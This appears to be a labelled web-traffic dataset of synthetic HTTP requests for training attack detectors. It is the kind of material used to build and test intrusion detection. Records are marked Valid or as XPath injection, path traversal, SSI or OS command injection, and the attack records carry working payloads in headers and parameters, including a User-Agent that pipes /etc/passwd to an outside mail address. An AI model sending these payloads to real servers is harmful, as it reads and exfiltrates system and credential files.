class: XPathInjection
GET /K8k8MWqr.nsf?guavlibh=bmTeMlQz1J1H&yiSN=69 HTTP/1.1
Host: www.sRwmi.org
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-2022-kr;q=0.8, iso-10646-ucs-2;q=0.5, windows-874, utf-8
Accept-Encoding: hSanT'   or 6   <   count(path/child::*)   or    'asso'=   '
Accept-Language: *;q=0.3
Cache-Control: max-age=3214
Client-ip: 142.40.161.228
Cookie: ryynct=a8GM5GQ@B@
Cookie2: $Version="900"
Date: Sat, 18 Mar 06 13:01:18 CET
ETag: "@uSSesptw@hr7uG6h"
Expect: eiLab=Usordus;re9a
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Thu, 08 Jun 06 04:46:33 CET
If-Unmodified-Since: Thu, 05 Jan 06 02:23:19 UTC
If-Match: "WGP@QVTfmxu76Hi"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: dneDtg c5itec=enfiila
Authorization: prriee L9Oe=uihhcs
Range: 8313-,-86247,250-55725
Referer: /htrpsa/lhtyh/amOtqt/iElu.doc
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: eIG-@OoBHM http://www.Bedr.gov
UA-Disp: 772,063,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 433x249
Via: FTP/3.6 www.dRuon.png:92499, hy7/6.9 155.37.24.54, 8.8 203.216.18.246
Transfer-Encoding: identity
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 589 97.236.200.85 "tutzsttjueassase" "Sat, 28 Mar 09 19:51:19 CET"
X-Forwarded-For: 190.33.188.59
X-Serial-Number: 278748120266538
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48328
Start - Id: 19161
class: Valid
GET /ceNpyaaiau/tr2fsooaetdrh/sitIreemendani1y/oaBhohhPlohtgendtCn.htm?tufhdi=xywvLq HTTP/1.0
Host: www.eaoc.net:022
Connection: zdgn
Accept: application/postscript
Accept-Charset: x-mac-icelandic;q=0.4, iso-8859-8-i, windows-1258;q=0.0, shift_jis
Accept-Encoding: compress, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 83.11.35.255
Cookie: Sd6ah6aparh9oO=87387285
Cookie2: $Version="645"
Date: Wed, 20 Dec 06 18:58:52 CET
ETag: "JKdo902.JrP1q_5Ym8X3"
Expect: 100-continue
From: sek8pot@tvoatn.ch
If-Modified-Since: Sun, 11 Jul 04 01:56:18 UTC
If-Unmodified-Since: Thu, 19 Apr 07 20:52:58 UTC
If-Match: "q10zJx9R3z0U1afkyJLm"
If-None-Match: "gFamLBDF_VJF25C0i"
If-Range: "H3VOUp7cnBqy8T9PT3Lo"
Max-Forwards: 74
MIME-Version: 6.2
Pragma: lc=Ho
Proxy-Authorization: seed uhnsrr=8hieutI
Authorization: oxea t9llrjyt=m7moteDl
Range: -26751,992963-79665,-06526
Referer: /3zzan/tyinuT4a.conf
TE: deflate,gzip;q=0.5
Trailer: If-Unmodified-Since
User-Agent: bbec7h/1.8.5
UA-CPU: MIPS
UA-Disp: 070,359,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 923x3383
Via: HTTP/8.8 www.heee.shtml, FTP/9.9 www.slns.tiff
Transfer-Encoding: deflate
Upgrade: rtecO/7.7, YhdLe/3.7, hose/2.0, 6szce/9.1, ide47/9.2
Warning: 460 248.187.73.189 "asmeuoee" 
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 0241089551352273
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19161
Start - Id: 46255
class: PathTransversal
GET /rwAbinXvYual3/lvmcd6X31uheV8ML.sRP/YF/x8coQ/eMXeWtNzzvdHLOO1Ja4a/oc8/smh/tQfxkbZsjA605V/sm.gnYxFbXVsjvO@/el/ag5ieeisflimii6eS6a/p5t5XUosCu0.php3?sma3=%2Fetc%2Fpasswd HTTP/1.1
Host: www.7wyHFetE1p.org
Connection: hy8lxkzi
Accept: */*;q=0.7
Accept-Charset: us-ascii;q=0.4, gb2312, windows-1254, iso-8859-4, iso-8859-6
Accept-Encoding: gzip;q=0.6, deflate
Accept-Language: isnidL-rctu5iL;q=0.6, dtsRt-mOltry;q=0.5, 3enoda-aht;q=0.2, agg-setceae;q=0.2, 5zr-6;q=0.6
Cache-Control: max-age=385
Client-ip: 190.79.101.95
Cookie: roe4=7<
Cookie2: $Version="7"
Date: Wed, 19 Jan 05 02:53:54 GMT
ETag: "_9L1EBmUlyekels"
Expect: tmde9whr
From: o8nret@EbsFqo4s.st
If-Modified-Since: Mon, 08 Nov 04 06:46:28 UTC
If-Unmodified-Since: Sun, 13 May 07 06:33:10 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Jun 09 10:23:41 UTC
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: Basic dHFSbUVzOlRscWN0ZQ==
Range: 5263-
Referer: http://www.8ZdAudN.uk/Otlhlst/0tgos/Irso01.php4
TE: trailers
Trailer: If-Modified-Since
User-Agent: nfaenoLrtwog
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: 0.7 192.255.190.248, 7.4 8.3.9.66:0964
Transfer-Encoding: emtc; saTe=ao9r15
Upgrade: roeie/1.4
Warning: 961 59.212.87.203:1 "2ryq" "Mon, 19 Mar 07 07:17:54 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 279234551
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46255
Start - Id: 27697
class: Valid
GET /8arpAaRii/0aG2/eMhL/15u8qtM.asp?J5nzsrDOd2=Fdig6fnouhtacces%5Ds+%3EehWt%25o&ehr0hwiua=333437&Nnyeit=frompumot&s7o=287584&na=os&eqsoaxoeipte9=eOfssoiA&ht5eEdu=cIti&2nd47a=mailteT&script_x.BQortwindow.open=416446&edn9f1eytu=%40axo%2Bwa%29zdkfromscvr1ob HTTP/1.0
Host: 0.199.102.16
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=458
Client-ip: 38.127.32.105
Cookie: gruhoc=4;ot3a7e0ejax=m4-cq9A;sthhsytst7o=5482916;phNia1rtl=ihwwp-npsall
Cookie2: $Version="78"
Date: Wed, 16 Jul 08 01:23:35 GMT
ETag: "mytNxrzipP7GNv4wnVi"
Expect: ee4re=lemXfen
From: bTem2@peiaee.st
If-Modified-Since: Wed, 25 May 05 22:16:21 CET
If-Unmodified-Since: Mon, 13 Apr 09 01:54:51 CET
If-Match: "9.y9JRJtY94iEqSnqXiQ"
If-None-Match: *
If-Range: Mon, 07 Aug 06 07:20:55 CET
Max-Forwards: 559
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Tsalfe tetpar=glslw3an
Authorization: Digest algorithm=myyej
Range: 19057-557
Referer: http://sktwmde.be/olufs/orhfc/wuno.jsp
TE: gzip;q=0.6
Trailer: TE
User-Agent: Sbbx/7.9
UA-CPU: PowerPC
UA-Disp: 9899,7417,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 576x948
Via: 3.2 www.id9n.css, FTP/7.2 www.sbaeai.js
Transfer-Encoding: identity
Upgrade: tdiRu/5.5, t6o0dD/7.2
Warning: 308 www.tixKj.jpg "aaearsdrrhaedma" 
X-Forwarded-For: 24.95.0.215
X-Serial-Number: 9842192214995
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27697
Start - Id: 25287
class: Valid
GET /eof5R8mpketYiAka/ohvsH0EegjtsmenshEu/ecAFKYt2Uz@6w@Xf.dll?iIuior=4erszriet&7hqdJEroisea1=54&eret7tssiez=af&n7systemPMpbetweenz1JS=i%26idb&Htdod2o1ncsi=ryl%3Di HTTP/1.0
Host: 136.42.81.12
Connection: close
Accept: application/x-tar
Accept-Charset: windows-1255, windows-874;q=0.6, iso-8859-8-i;q=0.2, us-ascii, iso-8859-6;q=0.5
Accept-Encoding: gzip, identity
Accept-Language: s4-asmLog;q=0.7, 5teg6u-tyruor;q=0.9, roic-e;q=0.1, ee9psLa-a
Cache-Control: no-cache
Client-ip: 103.126.32.237
Cookie: 7cioTshrrtseahw=b (8@;epsnesji=bnrledneex;irY3dnonottt4=saTrce
Cookie2: $Version="74"
Date: Fri, 24 Jul 09 01:32:18 CET
ETag: "BR0ht59u@YZvT5smlQP"
Expect: 100-continue
From: tgej@l4Mpeyut.cz
If-Modified-Since: Mon, 24 Jul 06 18:13:16 GMT
If-Unmodified-Since: Sun, 26 Mar 06 05:14:52 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Dec 04 04:09:05 CET
Max-Forwards: 7461
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: iDor bidltu6W=esnn
Authorization: Digest cnonce="twbz7"
Range: 14-8536,5-5795
Referer: http://mh8c.fr/oooln5/t18eAen/qsoyhtmo.js
TE: trailers
Trailer: Accept
User-Agent: usee (qVDkGt-1)
UA-CPU: Sparc
UA-Disp: 8204,1865,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9336x783
Via: 0.0 www.mnasn7t.jpg, 0.2 www.geptt.css:0
Transfer-Encoding: deflate
Upgrade: eeatdB/9.3, ledwr/7.1, aho/6.1, tyrUls/5.5, Nr2gre/4.2
Warning: 776 www.rdYxT.js:39275 "ktn2Rsp3eeodnxlt1dmc" "Sat, 28 Jun 08 20:23:50 UTC"
X-Forwarded-For: 249.207.205.242
X-Serial-Number: 139373036597408522
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25287
Start - Id: 4603
class: Valid
PUT /uyr0rutu2faHe/rSlogO/5BsV0DZn0shY/ji5rzepMmicj/haisesrthsau3zenci/qAHsbinwriohcw.gif? HTTP/1.1
Content-Length: 58
Content-Language: tlc,lw,ucj
Content-Encoding: compress
Content-Location: /httSeyy7.css
Content-MD5: cmZ0c29lcnJuaWh0bGVSRA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Oct 06 04:29:18 GMT
Last-Modified: Fri, 21 Aug 09 08:16:14 GMT
Host: www.lteht.net:80
Connection: close
Accept: */*
Accept-Charset: cp-950;q=0.1
Accept-Encoding: compress, gzip, deflate, deflate;q=0.9
Accept-Language: leazrnx-hnaeqe, ued-eimdoi;q=0.3, he-od
Cache-Control: only-if-cached
Client-ip: 106.70.84.133
Cookie: stnsgiatsvp=3024099;ad=tyrYe;cbfbtoe5trae3x=adatswmyital7tre
Cookie2: $Version="8"
Date: Mon, 25 Jul 05 07:51:33 GMT
ETag: "sg@ihNTuVOy75ZcaHms"
Expect: aul2t=nesi
From: shme@uth2.org
If-Modified-Since: Mon, 02 Nov 09 15:44:23 GMT
If-Unmodified-Since: Sat, 20 Oct 07 05:33:39 CET
If-Match: "os6uoAnYzHHjtITY"
If-None-Match: "jr-rCF.hw424PBWWXO"
If-Range: "XmNDKadOuE2QxpXgBATg"
Max-Forwards: 7
MIME-Version: 9.2
Pragma: t3in='iz1r'
Proxy-Authorization: Digest qop=auth-int
Authorization: uasi snea=Ithkuo
Range: -6763
Referer: /2rroyogy/atrq6me/55Tpsaue.php
TE: trailers,trailers
Trailer: Range
User-Agent: astilxhid5ip2r
UA-CPU: Sparc
UA-Disp: 456,796,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 2066x525
Via: 1.4 12.65.197.228, FTP/3.0 www.lawoeoN.tiff, HTTP/9.5 www.vuFqp.js:63
Transfer-Encoding: identity
Upgrade: veh/9.0, cojts/9.3, tnc/9.3
Warning: 848 215.17.207.198:27 "dhaswCc" "Tue, 17 Feb 09 02:45:11 CET"
X-Forwarded-For: 229.244.68.193
X-Serial-Number: 94988
----: -------------------------
~~~~~: ~~~~~~~~~~~~

ztai=0pzy&mosaorshe7=51247421&AbvarN3X=roetcur&aidmipa=693

End - Id: 4603
Start - Id: 49495
class: XPathInjection
GET /uOpF.KUAkox/evHpQ7tCQmjaaSx/uu7dAinvzMb/5DgltBrduhtvecahtoo/ioreyuilt/uT2mJe@@cE/ifdccesrsitnOoa/Letoy6F7FytrWdbPoIo6/t4yIsDKwscmvb8/zZrbrXQfaXEr79VH1CFr/5itcsa.htm?qcnEcg3winii=hgd3t1ef%7E9ausystemt&tt-UJ=+rprr%28+U5g&lsjsxyeate=9ex%27+or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28++++i+++%2Bj++%2B++k%2B+l++++%2B++++1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++%27nuyaad4%27%3D+++%27+++sebrtuOb%27+++++or&0eet=mfIrwtxxzepUiN&S5dhne8=05811&3iotIaissbcgp=sAZ33cYa%40xy&tmh1qr55an81ti=n.2%40Vu4p&esuawqsbl3hl6=6pimebih&pve5ct=eooee4eh&argg=eEm&5tAdcnsfaeeiei=ry0sswsh6asjI&40ncU=+oh9stn7Sc&ehhsm8oylo=10 HTTP/1.1
Host: 222.179.113.10
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: compress, compress;q=0.7
Accept-Language: ecEsasts-A7Ore
Cache-Control: no-transform
Client-ip: 223.242.155.63
Cookie: hANTYB=aos3tDloe;yNos3ahnt6v8eli=035_B3QVO5Z0;cmdmLfaVlibgwherereplace=2200561231;@qdCOunc@2Dw=yz
Cookie2: $Version="238"
Date: Thu, 07 Sep 06 01:54:14 CET
ETag: "JDg6S18LaQ9Ja_0YULOc"
Expect: iisFe6l=Ebbtsth;mie7ote=wwewriuc
From: heDlu@i6la6.fr
If-Modified-Since: Mon, 04 Jan 10 18:28:22 CET
If-Unmodified-Since: Tue, 05 Sep 06 17:04:25 CET
If-Match: *
If-None-Match: "iMfXCeqwU5.17ekm"
If-Range: Tue, 06 Mar 07 19:01:58 CET
Max-Forwards: 2683
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: 79Ynan eOtsi=mrfenfti
Authorization: urdmey er4o=atlis
Range: -012
Referer: http://www.ogiaNm.fr/oaha/tf2eb7.zip
TE: trailers
Trailer: Authorization
User-Agent: nwGrf13mdicleloi4a
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 527x1451
Via: 3.0 www.ytwsmu.tiff, uwleb/5.9 www.gpMAih.jpeg
Transfer-Encoding: deflate
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 769 www.giteyoe.png "lena5ieoo" 
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49495
Start - Id: 39841
class: SSI
POST /3Kr9d/elshlQ/O@jgiwscriptwnulln/qcaDobjectl/uOceoartou9se/hq7NlEdg5Va/connectHTNPG4CJimgAFfE/enwsr.shtml? HTTP/1.0
Content-Length: 16
Content-Language: 1etot6,aibl
Content-Encoding: deflate
Content-Location: http://Ehflbnro.gov/1iiptk/pTrtfn/tn0rAd.nsf
Content-MD5: bjZtZWVlaEtoZU5iaTU4dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Dec 07 17:15:41 UTC
Last-Modified: Wed, 21 Nov 07 18:11:12 CET
Host: 62.107.118.255
Connection: close
Accept: video/mpeg;q=0.9
Accept-Charset: hz-gb-2312;q=0.9, utf-7
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=4
Cookie: o3lnaohdtmIhte=h9TqmTid1o;trrns=d;sEdjp5ho=a yay
Date: Fri, 04 Dec 09 08:12:06 GMT
From: IxNddnw@esbte.net
If-Modified-Since: Fri, 23 Jun 06 18:45:41 GMT
If-Unmodified-Since: Wed, 07 Oct 09 17:13:33 GMT
If-Match: "BWWZfCi_DLDM0@TW"
If-None-Match: *
Max-Forwards: 892
Pragma: no-cache
Range: -05
Referer: http://www.trnop.cz/r9o12Gn/rhhClti4/mtSi/2tnc.htm
TE: gzip,trailers
User-Agent: <!--   #include   virtual="/var/log/httpd/access.log"     -->
UA-Color: color32
Warning: 290 144.167.27.105:99939 "faiwmhn2Lliv1gynD" "Thu, 27 Dec 07 16:10:00 GMT"
X-Serial-Number: 39752722900840058
~~~~~: ~~~~~~~~~~~~~~~

egyegsH=of2IGulZ

End - Id: 39841
Start - Id: 11784
class: Valid
GET /idsiheod/hisoyoh/wG/aennnrjdyeeet9rscyrg.png? HTTP/1.1
Host: 162.2.234.243
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.4, x-mac-greek
Accept-Encoding: compress;q=0.9, compress, gzip;q=0.3, deflate, compress
Accept-Language: mOor5e-rRxEb;q=0.8, r-la;q=0.1, tjbt-r0ar;q=0.1
Cache-Control: no-store
Client-ip: 210.1.7.169
Cookie: tai5smusomR=;\exterm
Cookie2: $Version="251"
Date: Sun, 10 Feb 08 09:20:27 GMT
ETag: "W8FBeDP7ZL82BwxKQ"
Expect: 100-continue
From: rliCtemd@rOnoI.fr
If-Modified-Since: Thu, 16 Apr 09 19:11:40 GMT
If-Unmodified-Since: Sat, 04 Nov 06 15:49:22 CET
If-Match: "wU8.yCEu7HV9ke.O"
If-None-Match: "vO98C7o1DvoqfApdV"
If-Range: Fri, 28 Nov 08 19:53:04 UTC
Max-Forwards: 76
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic aWVlaDo1c3RrdGU2
Authorization: NTLM YXRzaHVsc2MwbkdzZW5yaWtjMjB1Y09wMnEwY3BDZWhhc2dhN25lbGxhUHQ=
Range: 9-947069
Referer: http://www.jataI.gov/ma1yzr/2aiija/niufiu.php4
TE: trailers
Trailer: From
User-Agent: Mozilla/5.1 (compatible; MSIE 1.3; Win 9x; eeuasua; nmhe; dp31f5azo3)
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0954x9922
Via: HTTP/9.1 208.163.238.20, 2.5 www.soal8boM.png
Transfer-Encoding: identity
Upgrade: b5thi/6.3, innpsc/2.3
Warning: 010 93.171.200.42 "zs5dwspM1loAab" 
X-Forwarded-For: 92.235.100.67
X-Serial-Number: 89221086551285
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11784
Start - Id: 4452
class: Valid
PUT /3ho7hr8qptAjua/o48qSIR19PlyQlCLej0/kRA8-SZHl/ieY5qZ/lleqe/tySDKIFGVpJoS/JMunion6form2x_xL9Frboot.iniusr/qh52L@AO/9SDryp@wX.d@NQu/AM/rt4teH1sezunSqIeeii/rSbYI6URyzy_a.htm? HTTP/1.1
Content-Length: 226
Content-Language: e,tWdfe5e,snEn
Content-Encoding: compress
Content-Location: /8ezt/hhehizSe/ino2hur/7teop/lnFc.tar
Content-MD5: ZGJ6Umw5Y2FzYXo1YXNpZg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Mar 06 12:57:07 UTC
Last-Modified: Fri, 08 Feb 08 11:16:53 CET
Host: 131.235.160.22
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: a-Gik8, sagzpref-Oh;q=0.1, earb-eLRgd;q=0.6, t-dttp;q=0.5, zmNt-stopoe
Cache-Control: min-fresh=28398
Client-ip: 158.211.9.8
Cookie: ioiosm=nWx;vaf=heuree;Hnbn=275966523
Cookie2: $Version="774"
Date: Tue, 04 Jan 05 19:41:20 CET
ETag: W/"GJZ0QwxfnKVrWTPAX_Q"
Expect: 100-continue
From: onresk@onoddtq.be
If-Modified-Since: Sat, 10 May 08 12:41:39 GMT
If-Unmodified-Since: Fri, 29 Dec 06 17:52:36 UTC
If-Match: *
If-None-Match: "bZXiegKygRmJgdQy"
If-Range: Sun, 28 Sep 08 24:03:28 UTC
Max-Forwards: 130
MIME-Version: 8.6
Pragma: c1tYsWy='lx'
Proxy-Authorization: NTLM c2F0ZWVoOGRQckVvdWVvNWxlb2hvczY2amdlcm9uczI=
Authorization: Basic b3FpcWRoeG86bnZxZHk=
Range: 64421-813,254899-
Referer: http://tdtl.cz/trt7/ibaN/oAfeRd/Et65Tnp.nsf
TE: trailers,trailers
Trailer: Connection
User-Agent: ehtsoe (hQWvdt9; eAu2uP1za; 0AOw9R)
UA-CPU: StrongARM
UA-Disp: 5974,926,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 604x596
Via: 3.0 www.sqnys.tiff:40
Transfer-Encoding: y8ot
Upgrade: ulsw/2.5, rssRS/4.4, weIr/9.2, WMmae/9.2, taa/2.0
Warning: 774 98.7.54.149 "snI8ejlpssn" "Tue, 19 Apr 05 06:05:00 CET"
X-Forwarded-For: 11.144.91.166
X-Serial-Number: 053208446
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

c367nt9Ef=5447310934&h3w=as3dcaccess_logshutdownindNumochaaA&tAe=eaesy&b6=779303343&cs8=fZ1dN&W7sZiFM5UunionUposition=08948933&frHnfeelepttldn=:mtmjxiRcbsX3&vaftsdofmCc=a&qAs=31520949&JeYZ=ir56whfera&0a1r4ayngne=49mRwntSehrm

End - Id: 4452
Start - Id: 29596
class: Valid
GET /oqggUnluOgiwDW3wajw/Dnsxilmgh/jM1pPqVUeDLjAA0LKOy-/two/sEli@yQN/iiiie0ew/m5-bSPUm/nh8dLxElrlnHeIShavp/dsn1sh.bin?8ewrdO=323346&hidtEaetqeeIH=uroomaOtzo&l9nlr=include&Ihstafci=t5q6ACV5Jptr HTTP/1.1
Host: 206.164.80.56
Connection: close
Accept: text/*, image/*;q=0.4, image/*
Accept-Charset: iso-8859-3, windows-1251, iso-8859-9;q=0.6, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: chtho-riIcNetv, Ah-escHioz, jeoaj-e2oe0riz, ite-6serte;q=0.2, 5aedtmde-muoiebs;q=0.2
Cache-Control: max-stale=991
Client-ip: 8.216.164.50
Cookie: oSIjytt8s2slbI4=130;tLIt6sry=vm0x 7nxx
Cookie2: $Version="8"
Date: Sat, 14 Oct 06 04:36:53 CET
ETag: W/"CvEck.0p7o6t3wgUsg"
Expect: fheas=eaer
From: hk595Mi@tgQyreiAr.cz
If-Modified-Since: Sat, 30 Dec 06 17:05:25 CET
If-Unmodified-Since: Thu, 29 Jun 06 10:13:00 CET
If-Match: "9WmahyubzUer@F7"
If-None-Match: *
If-Range: Fri, 28 Nov 08 07:22:51 UTC
Max-Forwards: 1
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: rrTV htn2fsu=ieee
Authorization: wazo rinrtq=nuTeTtfa
Range: -074,-900485
Referer: /ilrumne/ithgm/b1wngtio/jNhesnI.exe
TE: trailers,gzip,trailers
Trailer: Upgrade
User-Agent: a4SkhfGcF http://www.llM3.uk
UA-CPU: StrongARM
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3909x9569
Via: 9.1 www.rem7msst.jpg:0908, nad1nT/0.2 176.24.99.202, FTP/6.9 183.237.233.193
Transfer-Encoding: l3br; ednbtony=srnsd
Upgrade: ie4rh/9.4, tantge/2.0, sthf/2.0, feanh/9.5, yiHIit/4.5
Warning: 552 www.eghciu.html "MEdi" "Thu, 09 Jun 05 12:22:53 GMT"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 755614
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29596
Start - Id: 36678
class: OsCommanding
GET /meOBu0_/akEi/izdTyHRNsM3W./qngsfr4frwf1vitlrad/l_NFqZTte4PIIoRWYlFJ/20_MzubO@ygY/dd.dll? HTTP/1.0
Host: www.aehdueem.it
Connection: lNttttt
Accept: audio/basic;q=0.7, video/*, video/*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.5
Cookie: Haw=6;2nnh=N1ewqtss7eFsc;titaaTw=rHcAX;eei=nsq;eniemTa=telnetVsepconnect
Date: Tue, 22 Aug 06 07:21:57 UTC
ETag: W/"2Mlu.cYSdWUO4WyLQ9"
From: seiip@xcilbht.de
If-Match: "rV2rRt5w6V76lMnTVl"
If-Range: Sat, 01 Oct 05 10:17:44 UTC
Max-Forwards: 2
Range: 373-,-3
Referer: /jizoNele/lhoE/arsouubb/euaejo.jpg
User-Agent: oops     ;  cat     /etc/passwd |mail    your@Oes.com
UA-CPU: 68000
Via: bbmiM/5.9 www.rbo76ri.jpeg
Transfer-Encoding: compress
----: ---------------------------------

null

End - Id: 36678
Start - Id: 30038
class: Valid
GET /if/ehw2dC6Y8ySEVW/o6NvG/abb@t05myB9bf/yvrrstbhnls9ressr/kNjCcopy7_/Hi3eaXoowahhe/zCeefpSBTEaLTcGJ/m7yrqayy/H-aZBTC.gif?trya=42555&ilqeeqrehenTet=eevaliep&tfnteetNbXnebru=olsa&syY=hiamn%3D%25edr&sNrowerg=ttsdf&4gtu6c=b&m3r47trIat7=5523166&gsidihocta1m=%2Bgroup+bylalrsEo5Wa0nr%2Bie&u6=6908899&aien=nttnytfeTseu9ofo&2OOhnH=eet9e+0th+a0a%7E&sl0ontanav=4eibohh7a&hlesoqe=351848 HTTP/1.0
Host: 180.45.27.60:80
Connection: iaeeCd
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t5Qartdo-8eo1spie;q=0.8
Cache-Control: 4heZ='Iie2tiSt'
Client-ip: 120.84.66.227
Cookie: p3apdnecfg=ohtsnHjhttpsk mfejb
Cookie2: $Version="97"
Date: Sun, 28 May 06 07:45:31 GMT
ETag: "sXT13TQc@X8@GvN3"
Expect: 100-continue
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Sat, 26 Nov 05 05:22:48 UTC
If-Unmodified-Since: Fri, 31 Oct 08 22:09:31 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Jun 08 01:05:37 GMT
Max-Forwards: 68
MIME-Version: 5.6
Pragma: gtindn=cesam2ct
Proxy-Authorization: Digest cnonce="oonrssi3"
Authorization: NTLM b2l1YXI0aGRkYWwwZWFmZWRlc2JzOXJhbmN0bnJTbGtmM2Nh
Range: -161,91297-7682
Referer: http://www.esaLiD.it/saphvtbr/7somoRNo/Echh.dll
TE: trailers
Trailer: Referer
User-Agent: wzalj (rIJRk@MXf; aEcsc1; tMKjcMOHSR)
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 796x660
Via: FTP/3.3 100.82.184.175:16, 0.0 110.210.107.214
Transfer-Encoding: compress
Upgrade: s81lie/1.8, naydi/8.7, srsna/2.2, pnie/8.0, phcti/3.8
Warning: 470 115.53.98.44 "adyveundimmN0s" 
X-Forwarded-For: 123.131.64.169
X-Serial-Number: 44720995
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30038
Start - Id: 19414
class: Valid
GET /ctrolkatx/satlbdeenerth/IOe-GX6/aheNkoituyossaif.shtml?elszic1mi=1881323&2Ifd=aegE&AH67OVnbLoptgA=jLmPc0Sshpstn&wezuDz67KH=80 HTTP/1.1
Host: www.Hi9sgmtm.com
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: euc-jp;q=0.9, windows-1252;q=0.8, x-mac-ce;q=0.7, iso-8859-8-i;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=541
Client-ip: 171.196.246.32
Cookie: .xrmFfDN=595613;8hg5eyos=ie+;Gq09insert9m=?oee;pn0peter=sw;i5a=3tdrb o;qUPK1YxtermxmlJVxD=27125
Cookie2: $Version="443"
Date: Mon, 08 Aug 05 23:05:58 GMT
ETag: "4fBtkGnN1iC7-i7nSOa"
Expect: Aayeaeu
From: unsxob@wuKtvh6Lni.com
If-Modified-Since: Wed, 02 Dec 09 06:57:32 GMT
If-Unmodified-Since: Sun, 18 Jan 04 14:52:44 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4838
MIME-Version: 8.3
Pragma: iDd=nealnnea
Proxy-Authorization: Digest nc=a68EDdAa
Authorization: qolhw rtei=entcei
Range: -6815,05-
Referer: http://www.itki.uk/ogchnIuu/srei/fEobdhat/tuheT/nltAteco.mp3
TE: chunked
Trailer: Expect
User-Agent: Mozilla/1.5 (X11; U; Open BSD i386 5.7; es-ul; rv:8.2.0) Gecko/80869339
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6070x723
Via: 2.2 98.217.253.217
Transfer-Encoding: deflate
Upgrade: 3tDr/0.3, octa/6.4
Warning: 004 www.i7gBe.tiff "ie1rvnye5ht" 
X-Forwarded-For: 242.54.249.88
X-Serial-Number: 55136594
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 19414
Start - Id: 23107
class: Valid
GET /cn7rr/ewflxt1eoea36w.tiff? HTTP/1.1
Host: www.eoannaPr.be:22
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5, isiri-3342, windows-1253, windows-1252;q=0.2, euc-tw
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: tnl1a=rney
Client-ip: 43.25.241.37
